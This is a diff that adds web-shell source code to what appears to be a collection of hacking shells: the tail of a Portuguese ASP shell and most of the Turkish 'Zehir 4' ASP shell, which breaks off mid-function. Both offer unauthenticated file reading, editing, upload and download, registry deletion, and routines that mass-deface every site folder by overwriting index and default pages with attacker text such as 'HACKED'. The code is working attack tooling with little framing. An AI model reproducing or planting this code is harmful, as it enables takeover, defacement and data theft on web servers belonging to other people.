+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+			Case "d"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
+					Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>deletada"
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+			Case Else
+				Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">ESCREVER CHAVE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">LER CHAVE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETAR CHAVE</a><br>"
+		End Select
+		Set WshShell = Nothing
+	Case "txtview"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
+		file = Replace(Trim(Request.QueryString("file")),"|","\")
+		Set fso = CreateObject("Scripting.FileSystemObject")  
+		Set a = fso.OpenTextFile(file)
+		Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+		Set a = Nothing
+		Set fso = Nothing
+	Case "txtedit"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Request.Form.Count = 0 Then
+			file = Replace(Trim(Request.QueryString("file")),"|","\")
+			Set fso = CreateObject("Scripting.FileSystemObject")
+			Set a = fso.OpenTextFile(file)
+			Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+			Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
+			Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
+			Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
+			Set a = Nothing
+			Set fso = Nothing
+		Else
+			Select Case Trim(Request.Form("savemethod"))
+				Case "Save"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
+				Case "Save as"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set objstream = fso.CreateTextFile(caminho,true,false)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+					Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
+					Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
+				Case Else
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					Set MyFile = ObjFSO.GetFile(caminho)
+					destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
+					MyFile.Move (destino)
+					If Err.Number = 0 Then
+						Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
+						Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+					End If	
+			End Select
+		End If
+	Case "download"
+		Response.Buffer = True
+		Response.Clear
+		strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
+		strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
+		strFileType = Request.QueryString("type")
+		if strFileType = "" then strFileType = "application/download"
+		Set fso = Server.CreateObject("Scripting.FileSystemObject")
+		Set f = fso.GetFile(strFilename)
+		intFilelength = f.size
+		Set f = Nothing
+		Set fso = Nothing
+		Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
+		Response.AddHeader "Content-Length", intFilelength
+		Response.Charset = "UTF-8"
+		Response.ContentType = strFileType
+		Set Stream = Server.CreateObject("ADODB.Stream")
+		Stream.Open
+		Stream.type = 1
+		Stream.LoadFromFile strFileName
+		Response.BinaryWrite Stream.Read
+		Response.Flush
+		Stream.Close
+		Set Stream = Nothing
+	Case "upload"
+		If Request.QueryString("processupload") <> "yes" Then
+			Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
+			Response.Write "<TABLE BORDER=0>"
+			Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
+			Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
+			Response.Write "</TABLE>"
+		Else
+			Set Uploader = New FileUploader
+			Uploader.Upload()
+			If Uploader.Files.Count = 0 Then
+				Response.Write "File(s) not uploaded."
+			Else
+				For Each File In Uploader.Files.Items
+					File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
+					Response.Write "File Uploaded: " & File.FileName & "<br>"
+					Response.Write "Size: " & File.FileSize & " bytes<br>"
+					Response.Write "Type: " & File.ContentType & "<br><br>"
+					Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+				Next
+			End If
+		End If
+	Case "mass"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
+			On Error Resume Next
+			Set MonRep = ObjFSO.GetFolder(caminhodomass)
+			Set ColFolders = MonRep.SubFolders
+			for each folderItem in ColFolders
+				destino1 = folderItem.path & "\index.htm"
+				destino2 = folderItem.path & "\index.html"
+				destino3 = folderItem.path & "\index.asp"
+				destino4 = folderItem.path & "\index.cfm"
+				destino5 = folderItem.path & "\index.php"
+				destino6 = folderItem.path & "\default.htm"
+				destino7 = folderItem.path & "\default.html"
+				destino8 = folderItem.path & "\default.asp"
+				destino9 = folderItem.path & "\default.cfm"
+				destino10 = folderItem.path & "\default.php"
+				MeuArquivo.Copy(destino1)
+				MeuArquivo.Copy(destino2)
+				MeuArquivo.Copy(destino3)
+				MeuArquivo.Copy(destino4)
+				MeuArquivo.Copy(destino5)
+				MeuArquivo.Copy(destino6)
+				MeuArquivo.Copy(destino7)
+				MeuArquivo.Copy(destino8)
+				MeuArquivo.Copy(destino9)
+				MeuArquivo.Copy(destino10)
+				Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
+				If Err.Number = 0 Then
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
+				Else
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
+				End If
+				Err.Number = 0
+				Response.Flush
+				If metodo = "brute" Then
+					Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
+				End If
+			next
+		End Sub
+		Sub brutemass(caminho,massaction)
+			If massaction = "test" Then
+				On Error Resume Next
+				Set MonRep = ObjFSO.GetFolder(caminho)
+				Set ColFolders = MonRep.SubFolders
+				Set ColFiles0 = MonRep.Files
+				for each folderItem in ColFolders
+					Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
+					Set EachFolder = TotalFolders.SubFolders
+					Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+					maindestino = folderItem.path & "\"
+					MeuArquivo.Copy(maindestino)
+					Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
+					If Err.Number = 0 Then
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+					Else
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+					End If
+					Err.Number = 0
+					Response.Flush
+					If EachFolder.count > 0 Then
+						masscontador = 0
+						for each subpasta in EachFolder
+							masscontador = masscontador + 1
+							destino = subpasta.path & "\"
+							If masscontador = 1 Then
+								destinofinal = destino
+								pathfinal = subpasta.path
+								Err.Number = 0
+								MeuArquivo.Copy(destinofinal)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							Else
+								MeuArquivo.Copy(destino)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							End If
+						next
+						masscontador = 0
+					End If
+					Response.Write "</table><br>"
+					Call brutemass(folderItem.path & "\","test")
+				next
+				Set MonRep = Nothing
+				Set ColFolders = Nothing
+				Set ColFiles0 = Nothing
+			Else
+				If Request.Form.Count = 0 Then
+					Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> copia os arquivos do deface para todas as pastas e subpastas (todos os n�veis) do diret�rio escolhido (mais demorado). O tempo do deface vai variar de acordo com o numero TOTAL de diret�rios.<br><br>"
+					Response.Write "<b>Single:</b> copia os arquivos do deface apenas para as pastas (primeiro n�vel) do diret�rio escolhido. N�o inclui subpastas.<br><br>"
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
+					Response.Write "<center><font face=""arial"" size=""2"">Insira o c�digo:<br>"
+					Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
+					Response.Write "<input type=""submit"" value=""w00t!""></center>"
+					Response.Write "</form>"
+				Else
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+					arquivomassdfc = patharquivotxt & "teste.txt"
+					Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
+					vetordelinhas = Split(Request.Form("content"),VbCrLf)
+					For i = 0 To UBound(vetordelinhas)
+						Arquivotxt.WriteLine(vetordelinhas(i))
+					Next
+					Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
+					
+					If Request.Form("massopt") = "single" Then
+						Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
+					ElseIf Request.Form("massopt") = "brute" Then
+						Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
+					End If
+				End If
+			End If
+		End Sub
+		If Trim(Request.QueryString("massact")) = "test" Then
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			arquivo = patharquivotxt & "_vti_cnf.log"
+			Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
+			Set MeuArquivo = ObjFSO.GetFile(arquivo)
+			Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
+		ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
+			Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
+		End If
+	Case Else
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Call showcontent()
+End Select
+If Err.Number <> 0 Then
+	Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse o <b>ONLINE HELP</b> para a explica��o do erro"
+End If
+Response.Write endcode
+%>
diff --git a/xakep-shells/ASP/Zehir 4.asp.txt b/xakep-shells/ASP/Zehir 4.asp.txt
new file mode 100644
index 0000000..1be2420
--- /dev/null
+++ b/xakep-shells/ASP/Zehir 4.asp.txt	
@@ -0,0 +1,1190 @@
+<%
+mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
+dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
+on error resume next
+Dim objFSO,popup
+Set objFSO = CreateObject ("Scripting.FileSystemObject")
+if Request("kuskapani")=1 then
+    Response.End
+end if
+
+
+if Request("kuskapani")=2 then
+    on error resume next
+    path = Request("path")
+    sFolder = Request("SubFolder")
+    fName = Request("FileName")
+    d1 = Request("dosya1")
+    d2 = Request("dosya2")
+    d3 = Request("dosya3")
+    d4 = Request("dosya4")
+    bg__ = Request.Form("selectColour")
+    if bg__ = "0" then bg__ = "#ffffff"
+    byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>HACKED " & Session("n2") & "3 ;)</font>"
+
+    sFolder = Replace(sFolder,"/","\")
+
+    if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    h__ = 0
+    f__ = 0
+    ss__ = now
+    For Each f1 In fc
+        hedef_ = replace(f1.path,"/","\")
+        if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
+        hedef__ = left(hedef_,len(hedef_)-1)
+        folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
+            if d1<>"" then d1 = true
+            if d2<>"" then d2 = true
+            if d3<>"" then d3 = true
+            if d4<>"" then d4 = true
+            on error goto 0:on error resume next
+            if fName<>"" then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
+                MyFile.write byMesaj
+            end if
+            if d1 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d2 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d3 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
+                MyFile.write byMesaj
+            end if
+            if d4 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
+                MyFile.write byMesaj
+            end if
+
+            if err<>0 then
+                response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
+                f__ = f__ + 1
+            else
+                response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
+                h__ = h__ + 1
+            end if
+    Next
+    ss___ = now
+    response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam S�re : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
+    response.End
+end if
+
+status = Request("status")
+path   = Request("path")
+dPath  = Request("dPath")
+arama  = Request("txArama")
+dkayit = Request("dkayit")
+table  = Request("table")
+del    = Request("del")
+islem  = Request("islem")
+strSQL = Request("strSQL")
+cf       = Request("cf")
+pathfile = request("pathfile")
+if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
+if status="" then status=2
+popup = true
+'////////////////////////////////
+Function ReadBinaryFile(FileName)
+  Const adTypeBinary = 1
+  Dim BinaryStream
+  Set BinaryStream = CreateObject("ADODB.Stream")
+  BinaryStream.Type = adTypeBinary
+  BinaryStream.Open
+  BinaryStream.LoadFromFile FileName
+  ReadBinaryFile = BinaryStream.Read
+End Function
+if status="-3" then
+    Response.Buffer=True
+    Set Fil = objFSO.GetFile(pathfile)
+
+    Response.contenttype="application/force-download"
+    Response.AddHeader "Cache-control","private"
+    Response.AddHeader "Content-Length", Fil.Size
+    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
+
+    Response.BinaryWrite readBinaryFile(Fil.path)
+    Set f = Nothing: Set Fil = Nothing
+    response.End()
+end if
+'//////////////////////////////////
+if status="-4" then popup=false
+if status="13" then popup=false
+if status="14" then popup=false
+if status="15" then popup=false
+if status="16" then popup=false
+if status="17" then popup=false
+if status="18" then popup=false
+if status="19" then popup=false
+if status="33" then popup=false
+if status="40" then popup=false
+if status="50" then popup=false
+byMsg = request.QueryString("byMsg")
+if byMsg<>"" then response.Write byMsg
+response.Write "<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&gt;</title>"
+if popup then
+%>
+<center>
+<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
+<script language=javascript>
+    function sistemBilgisi(yol){
+        NewWindow(yol,"",600,240,"no");
+    }
+    function SitelerTestte(yol){
+        NewWindow(yol,"",530,420,"no");
+    }
+    function klasorIslemleri(yol){
+        NewWindow(yol,"",400,280,"no");
+    }
+    function sqlServer(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function poweredby(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function sistemTest(yol){
+        NewWindow(yol,"",400,300,"no");
+    }
+</script>
+<%
+end if
+'####################################
+Class clsUpload
+    Private mbinData
+    Private mlngChunkIndex
+    Private mlngBytesReceived
+    Private mstrDelimiter
+    Private CR
+    Private LF
+    Private CRLF
+    Private mobjFieldAry()
+    Private mlngCount
+
+    Private Sub RequestData
+        Dim llngLength
+        mlngBytesReceived = Request.TotalBytes
+        mbinData = Request.BinaryRead(mlngBytesReceived)
+    End Sub
+
+    Private Sub ParseDelimiter()
+        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+    End Sub
+
+    Private Sub ParseData()
+        Dim llngStart
+        Dim llngLength
+        Dim llngEnd
+        Dim lbinChunk
+        llngStart = 1
+        llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+        While Not llngStart = 0
+            llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+            llngLength = llngEnd - llngStart
+            lbinChunk = MidB(mbinData, llngStart, llngLength)
+            Call ParseChunk(lbinChunk)
+            llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+        Wend
+    End Sub
+
+    Private Sub ParseChunk(ByRef pbinChunk)
+        Dim lstrName
+        Dim lstrFileName
+        Dim lstrContentType
+        Dim lbinData
+        Dim lstrDisposition
+        Dim lstrValue
+        lstrDisposition = ParseDisposition(pbinChunk)
+        lstrName = ParseName(lstrDisposition)
+        lstrFileName = ParseFileName(lstrDisposition)
+        lstrContentType = ParseContentType(pbinChunk)
+        If lstrContentType = "" Then
+            lstrValue = CStrU(ParseBinaryData(pbinChunk))
+        Else
+            lbinData = ParseBinaryData(pbinChunk)
+        End If
+        Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+    End Sub
+
+    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+        Dim lobjField
+        ReDim Preserve mobjFieldAry(mlngCount)
+        Set lobjField = New clsField
+        lobjField.Name = pstrName
+        lobjField.FilePath = pstrFileName
+        lobjField.ContentType = pstrContentType
+        If LenB(pbinData) = 0 Then
+            lobjField.BinaryData = ChrB(0)
+            lobjField.Value = pstrValue
+            lobjField.Length = Len(pstrValue)
+        Else
+            lobjField.BinaryData = pbinData
+            lobjField.Length = LenB(pbinData)
+            lobjField.Value = ""
+        End If
+        Set mobjFieldAry(mlngCount) = lobjField
+        mlngCount = mlngCount + 1
+    End Sub
+
+    Private Function ParseBinaryData(ByRef pbinChunk)
+        Dim llngStart
+        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+        If llngStart = 0 Then Exit Function
+        llngStart = llngStart + 4
+        ParseBinaryData = MidB(pbinChunk, llngStart)
+    End Function
+
+    Private Function ParseContentType(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 15
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+    End Function
+
+    Private Function ParseDisposition(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 22
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+    End Function
+
+    Private Function ParseName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 6
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+' ------------------------------------------------------------------------------
+    Private Function ParseFileName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 10
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+
+    Public Property Get Count()
+        Count = mlngCount
+    End Property
+
+    Public Default Property Get Fields(ByVal pstrName)
+        Dim llngIndex
+        If IsNumeric(pstrName) Then
+            llngIndex = CLng(pstrName)
+            If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+                Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+                Exit Property
+            End If
+            Set Fields = mobjFieldAry(pstrName)
+        Else
+            pstrName = LCase(pstrname)
+            For llngIndex = 0 To mlngCount - 1
+                If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+                    Set Fields = mobjFieldAry(llngIndex)
+                    Exit Property
+                End If
+            Next
+        End If
+        Set Fields = New clsField
+    End Property
+
+    Private Sub Class_Terminate()
+        Dim llngIndex
+        For llngIndex = 0 To mlngCount - 1
+            Set mobjFieldAry(llngIndex) = Nothing
+
+        Next
+        ReDim mobjFieldAry(-1)
+    End Sub
+
+    Private Sub Class_Initialize()
+        ReDim mobjFieldAry(-1)
+        CR = ChrB(Asc(vbCr))
+        LF = ChrB(Asc(vbLf))
+        CRLF = CR & LF
+        mlngCount = 0
+        Call RequestData
+        Call ParseDelimiter()
+        Call ParseData
+    End Sub
+
+    Private Function CStrU(ByRef pstrANSI)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = LenB(pstrANSI)
+        For llngIndex = 1 To llngLength
+            CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+        Next
+    End Function
+
+    Private Function CStrB(ByRef pstrUnicode)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = Len(pstrUnicode)
+        For llngIndex = 1 To llngLength
+            CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+        Next
+    End Function
+End Class
+'####################################
+Session("n1") = "by Ejder"
+Class clsField
+    Public Name
+    Private mstrPath
+    Public FileDir
+    Public FileExt
+    Public FileName
+    Public ContentType
+    Public Value
+    Public BinaryData
+    Public Length
+    Private mstrText
+
+    Public Property Get BLOB()
+        BLOB = BinaryData
+    End Property
+
+    Public Function BinaryAsText()
+        Dim lbinBytes
+        Dim lobjRs
+        If Length = 0 Then Exit Function
+        If LenB(BinaryData) = 0 Then Exit Function
+
+        If Not Len(mstrText) = 0 Then
+            BinaryAsText = mstrText
+            Exit Function
+        End If
+        lbinBytes = ASCII2Bytes(BinaryData)
+           mstrText = Bytes2Unicode(lbinBytes)
+        BinaryAsText = mstrText
+    End Function
+
+    Public Sub SaveAs(ByRef pstrFileName)
+        Const adTypeBinary=1
+        Const adSaveCreateOverWrite=2
+        Dim lobjStream
+        Dim lobjRs
+        Dim lbinBytes
+        If Length = 0 Then Exit Sub
+        If LenB(BinaryData) = 0 Then Exit Sub
+        Set lobjStream = Server.CreateObject("ADODB.Stream")
+        lobjStream.Type = adTypeBinary
+        Call lobjStream.Open()
+        lbinBytes = ASCII2Bytes(BinaryData)
+        Call lobjStream.Write(lbinBytes)
+
+        On Error Resume Next
+
+        Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+
+        'if err<>0 then response.Write "<br>"&err.Description
+
+        Call lobjStream.Close()
+        Set lobjStream = Nothing
+    End Sub
+
+    Public Property Let FilePath(ByRef pstrPath)
+        mstrPath = pstrPath
+        If Not InStrRev(pstrPath, ".") = 0 Then
+            FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+            FileExt = UCase(FileExt)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+        End If
+    End Property
+
+    Public Property Get FilePath()
+        FilePath = mstrPath
+    End Property
+
+    private Function ASCII2Bytes(ByRef pbinBinaryData)
+        Const adLongVarBinary=205
+        Dim lobjRs
+        Dim llngLength
+        Dim lbinBuffer
+        llngLength = LenB(pbinBinaryData)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+        Call lobjRs.Update()
+        lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        ASCII2Bytes = lbinBuffer
+    End Function
+
+    Private Function Bytes2Unicode(ByRef pbinBytes)
+        Dim lobjRs
+        Dim llngLength
+        Dim lstrBuffer
+        llngLength = LenB(pbinBytes)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
